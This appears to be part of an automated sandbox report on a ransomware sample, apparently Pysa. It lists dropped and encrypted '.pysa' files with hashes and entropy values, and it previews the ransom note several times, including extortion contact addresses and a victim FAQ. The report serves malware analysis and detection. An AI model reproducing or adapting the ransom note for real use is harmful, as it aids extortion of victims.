                  SHA-512:71D625733DD8956C017BE3C047ACA14F3D46D363DB19E8378DFD8D46213BD44ADEBFC177C6B333BAB88E7B85E15B87C40C444F7D2D06E3B7DCC66D2F4B2731C8
                  Malicious:true
                  C:\ProgramData\Adobe\ARM\S\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):7.8690380725252105
                  Encrypted:false
                  SSDEEP:384:jyx/T85eF3cw3I8/7ZajSBdLDWTay85LCz0IolBpKhz/+0EJmb:jyt4ocw3bz7LLt5LCwIoYhz/+0EJM
                  MD5:C2F74B07B4CC4141928C37E0D94F01CE
                  SHA1:F37A72B0C97080CDF59CEA5610A43B2D4633DBF1
                  SHA-256:66FF169E1D2D82EBFECDAE78FBF737941B246D32B518B290873A9B0A2BFE3115
                  SHA-512:019069B6D6B1CBE15CEB402C45A20C5D53A22D8071D07B05F85B86E11B630582B8737B47A4999D8E0DDC816B7B5241460344C1D422F23C7A2A5DCADDE90396B0
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  C:\ProgramData\Adobe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  C:\ProgramData\Adobe\Setup\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):24434688
                  Entropy (8bit):7.999991974155476
                  Encrypted:true
                  SSDEEP:393216:Q1cLDkv0RTSUyAYo9MkIekVTh1hfm7B5i5ORoRja9akZHZJaSBOCBce:Q1cu0tTy0eek99m7ri4RoNa9akRaSICr
                  MD5:B385671C91E36F736BFA6726E60FDFFB
                  SHA1:74E4BC81D66A8A5B17698272D9B6A5883D1A034A
                  SHA-256:D3C39DFC31300CA0F2780C1A5CA336A492C809FC500526902531D7C85FCE7109
                  SHA-512:C39CE8BC57842C0F54919E07D2010ECE35A4B92B34E11F264D687F3D0E4CEEB2EB66B9AF8C597CBF78F7A858191CDAA99B940C90BADEE99800D0E1447F992E51
                  Malicious:true
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2766848
                  Entropy (8bit):7.9999331616858
                  Encrypted:true
                  SSDEEP:49152:rV0N3Dj++VKD/ZdKFnnkHXKGptNjaIg65lXlUKOcx4PuSkGMJ8LwYYQyeJbV9rB/:rO2quZdeeKGn2BgvqPuSk5ScYxyen9rd
                  MD5:8B566DCBE8495E7E4959472AB967E2FA
                  SHA1:176513AC0997C50CBB483DC092DB69327E17E30D
                  SHA-256:58180CAB3CDB64958ED927849E57C02035ED3AE8147856439785A215ED375AF1
                  SHA-512:B7970D23C2A217B8E91A9D76AD5C80B596A77FDBD5A0771112DA0C72B4FD8C96B3B7239773A9905FB910720416E8F5D5C172D965107594ADF9975EE65F039819
                  Malicious:true
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17512448
                  Entropy (8bit):7.999986673125578
                  Encrypted:true
                  SSDEEP:393216:q+ZrWTIk77KHS9lo73KwZYC2dt80idHjU6KUMZE6jdmzo+:q+pw7uHS3sKSYC+t80KlSLjIzb
                  MD5:C6FD57DE5E74C72A751E5B5843281560
                  SHA1:1BE29C8B8BD51EF0D67805492C873B6E8A42E4EB
                  SHA-256:7F9D92FFABC741352302BDDEE0B4730E8F62FEF70897406762AAB036F48CF30F
                  SHA-512:8D875F3BD94ECB535E6195F90E6D350D95F6E181537A0758F16E606A9ABCE601076C192E9DBF229B02430525ED5E62AD4EB1A4015698F416F7132D84F438DC08
                  Malicious:true
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.796307126231862
                  Encrypted:false
                  SSDEEP:96:OVGxN9MDNJVsKQEyG+aurW3RSUzNqqdAmNjcJ9/80n:20NCDt5QEH+avRrNq9mNjUV3
                  MD5:283CDC14D96CB5A1F479168377722649
                  SHA1:AC39AA02BD9A97EB8056E366558AE1C562933072
                  SHA-256:60827E391340CE6739B769CC5AED2E0C4F957F8E2CB38530213CAEC6286A2A4A
                  SHA-512:DCA5D28F31423F1CEEA15EBD21FA65BCCF45FFDE2A3219FE9AC3D7310E402E2D6065F678786432E0FDD2E1715CE8928AF070495CBE16F9CA840D8A65F1C87C64
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.070676217100435
                  Encrypted:false
                  SSDEEP:48:d/xWIIM/wIfiO3OA9/bvaauRCsvLNkM0zZvEzlSy+6qJUEMZqSTzYL9Ahr3UsSlY:JxWI3OibwzNkMEcz3PqJUE9PLmr3clJO
                  MD5:1B2056E4A0DB8F0346DFEBD9ECE48E3D
                  SHA1:F779E93C44A4F73A845A46D1C87B03BC4089D913
                  SHA-256:625F228E08F8ACACE60A6ED74D4A69685C3C169812397A945637265BB4516CA1
                  SHA-512:07030CCC2F3AAA93D641252F5B02F89FFCF7401299CC4007ECC4D8B2D3DFFBA84A9364DFFF662B1DBF4D5CF2E66CC02CA26E4B493CB996024E6FCF21E5BB2B92
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.032015509367459
                  Encrypted:false
                  SSDEEP:48:wakE/1KnbhnBfAs5dsT5ks0MaPXll2T+x0Pcr7hXHtQsOLKu7lXbyumaLAPZTpo:wak6KntBos/0ml0T+mPcr5HvOLbWugtu
                  MD5:A54BED31892A9C51243A228B74F44A79
                  SHA1:1CE0CE14F3A5214E907C2CFBA679269D793B371C
                  SHA-256:64A4DE51EE3C4F3AE5D6D8EC051C92D11D4F3A9C1871679BCFF4471EDD3B1620
                  SHA-512:F3F4C424C8EF896C6985B6A70CD73D6CE454B39D6F4007FC416E78E3BB03B41766E1C7A1A1DE5C561D79197CFA4CD1432238F2D5B5601EE2F9014AD3C4B6745C
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04922911868008
                  Encrypted:false
                  SSDEEP:48:i+f33Ath1uJpJgkvMXEABMH/myAjo9VOZZ6kfgBjOy3CbJdYwuYLGAeR9+XOqqGF:iG33A+UpBU7AiCZ6k8OiCLu19+eqqyqG
                  MD5:BB15FB05B3E1CD2D06AB5215B246E0B7
                  SHA1:318D87DA006F0D71C273437DB5B69722FCA023EE
                  SHA-256:BC976DEB75308D6F69DADB217E58C233E21062681B9A619FCB27B28E9530C04B
                  SHA-512:7FE50263796437E6431DCED75F1D941DFEA5FEA92015264A2492F12FFFC2C2659603E2783336B34A8263336CF35C3F3B7F8817233FB1710CF23FECC355BF9BA3
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.068156304831019
                  Encrypted:false
                  SSDEEP:48:5ZW8ftwYvo8wvd0DIQLwAa8a7EnM8kqnU68rX9WkBsZyIrK8oL76qBUVxBQnp+:C8ftwb8rDtLwAa8C/MN8D92Zy4RM76jV
                  MD5:009F2AC901F551379E113D7084302901
                  SHA1:4A5CE6F54BA9DFCE1953A06661B960BCADB4FF3A
                  SHA-256:A2C3AF9E24D7494D78FB7FF0354C85557D985DFDABD3035575A2DBBEC6ADB58C
                  SHA-512:DFE54B220A9DF5D6AFB9107D0A103822E11ACDF725F53F58BE4196552A3964C516BF947D8B307AA850A83E181C206FDB5AE4C1E087DE15E83ADB2C3509E82B31
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.050052499100622
                  Encrypted:false
                  SSDEEP:48:wXYD0nBPgYyE2aqfL/OrPO/PzZyiKRgFdnO+jmbddMM14ZY0Oar2DUYLSaEeCNBZ:tgIrL/O6/bZyi9POfdl1x1aKXLse1jl8
                  MD5:991E914DD87BB55BA1CE106953FB1F8F
                  SHA1:12D3DA11C224783A9069484861895B53AD0978B1
                  SHA-256:B7627D2F760B0E5DF93166C39959A0D1517C32C7574D14C28B2EFAC7E8734AEC
                  SHA-512:A7E277D79B7BB30DEBE01F01EE2F6B338E040EBCACD2EE339590DB35EEA62B89F5DFA3DE699346983348A1E07AA2C1FC5184947343B8B3E13729C361EEB705D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062346453510331
                  Encrypted:false
                  SSDEEP:48:eTOJXPCqpsGDc0eRHUZQxMpFpb4RMeHtnSfp8jwEQHzgNGPUyZ0jwb50K6LXojAg:eqtaGgZFxu6RjtSfy7QTKqj6w10nLuC6
                  MD5:93533EBE901565D997809E6099D335B0
                  SHA1:8B1A3F37DFEF713847EE3B97679456BB9CBBB3BE
                  SHA-256:9D84C1A0CA068486C7C0A216058CCFBEB043FDBD407A9DCFE3723C9ADA9E8304
                  SHA-512:C0365696ABDDF4619DE7CDC352EA1F83476E00F919CA283315DF269D865AC5762FEDA9323C2242255BC3CAC02BB9C61B0F1C05CC9491DB23AF51718F5D5C9305
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.081993942718598
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062607384342852
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057156757460325
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0628169853026215
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.080175449675264
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02088649595201
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.766793064138911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055475661404412
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04194506732703
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.036271750306636
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067674545730818
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040031559318252
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0353014210486355
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047140531091981
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.087062358931338
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.022122671994594
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047768318508226
                  Encrypted:false
                  SSDEEP:48:LfxP4z9FpgnibzxQDOiW7LEXdQRKiD9gCXpqjg/ScJ+fa5jIBjXfDaA1V+oMBpBk:hIgnib1QDOiW7LUdb+oTDaC+oMfg7x8q
                  MD5:18D4FDE94DF3A967232DDA43BDD2019A
                  SHA1:389C208733A6A4DAEC483A5149A2AEB139CE9DAD
                  SHA-256:C72621281303343E3A935AE304B219848F21334CAC529AF4B7165B965EC17C9A
                  SHA-512:4B35C963B7E56CC98AEECE30A5D2F5C659F8FDB7077FC8F77370160653F6A53C0DCFB3C75D50B91E4FE7A1252D12444E98332083FE13C3A58F60DCD46DE066F0
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045163873113281
                  Encrypted:false
                  SSDEEP:48:KWheD9LReZ1p85ne5ZcRbDpw5RHAiy+p/bc1TBWk4K9ploShvzUdAz2jnBNn:KWheD9le5AZRGTAnIzc1EEDz5kAzmN
                  MD5:3DB0DDAA506822E4CCA193E134EF3A1E
                  SHA1:4D66B55BADB03D42C8D2CFE78BBD5DBD0D23C05D
                  SHA-256:E9C1920E88F7F227D5B2783F7270340E069FF8775A243E3A0EEA8E6C33B512D3
                  SHA-512:C48AE86951A2252459218B432269FD290A388B9D359026A2870704A5492A92205907E82E6ED77BA0A985F1D06ADC6220BBC154D44AA5918BEB60F5863C4CABE0
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055506247085594
                  Encrypted:false
                  SSDEEP:48:X1FokegPu+bCTUqtTPJ/eChZvnd/0Y83AzgMOz2nWJ7m36qlsSRhZD/3oRHtJd5T:XLru+W48tZvnE36M6J6qlsShB+w58MG
                  MD5:761AAAE4F7E0E27984A21F0C0C29FD23
                  SHA1:718A4E31CB248BF05E19DB12B26204B406E26243
                  SHA-256:55F54857C8AD27C9A054A7ED9D88DC79255FEF8C5F51C10A8CDB1A1A7669401A
                  SHA-512:3028B220AB2E9F189778DD0F720BEF361739D8453EA417D219A6A1ECB56EE005EBBE90B12DBFAFAE7A586A2AA157E6EEC41DE618967FA2B22E880427182B065B
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.044387413649741
                  Encrypted:false
                  SSDEEP:48:T9c/G6iLOHbIaeRng/1Ml6KinFIvlh9qz/68xPVeTIbDAWx/YwicF34VYFGCRBn:TnTCHbrImHKiMBqz/683u4347CRB
                  MD5:603AB1D2417C39C88F1272411C44C856
                  SHA1:0B555642213C33AEF38F1E4AC99B51DC16E84B19
                  SHA-256:FD059BC0D3B8E81F29D3806B76FA57172E8F5690C1A9D3996BEA2A324DFCC116
                  SHA-512:BA327728AA0013A32AF356C37EC0C0918DEC0534F9316A0B6E854F6992FF95A5691A2760933E853A3F135DF1C54A79040A2C24871B17B52CD4B26AD56EFD0BF6
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05088261767325
                  Encrypted:false
                  SSDEEP:48:eBwB1rickgYfnAoFJWhGIVEN9FVCJ9H7CSG1s/W/+QQX5Qf98SS+U:eBYriYY/rXW8xXsCSG2/DQGeOSS+U
                  MD5:FA81826DFE4F7B0BA091D1E3EFC0FAB7
                  SHA1:5E485FE47A7B4CF2A6AB0D20A7BEB0C2F234AF6D
                  SHA-256:674A7F3764E190D8479FD5E7D26210F89E2F79CDEE0C03828A58A7C872B1C787
                  SHA-512:680EFF0E836D34B95EFAF61E51ED8EB744A81C19A70BC21CD60A100FEEC89BCFA0D99EE09A63A06F55B0E60A03A20CCCF390C7178B00577EDE1D6189B9756538
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Defender Firewall with Advanced Security.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053474636354847
                  Encrypted:false
                  SSDEEP:48:oduVxXER+j1znoRVr9dOu/bb1cbzMks0pj83g7vP4VA++H2C0prMhbxiFUhB+yOK:guVKPRhOKR0MnS8w7ngA+Tih1Lh7WDlW
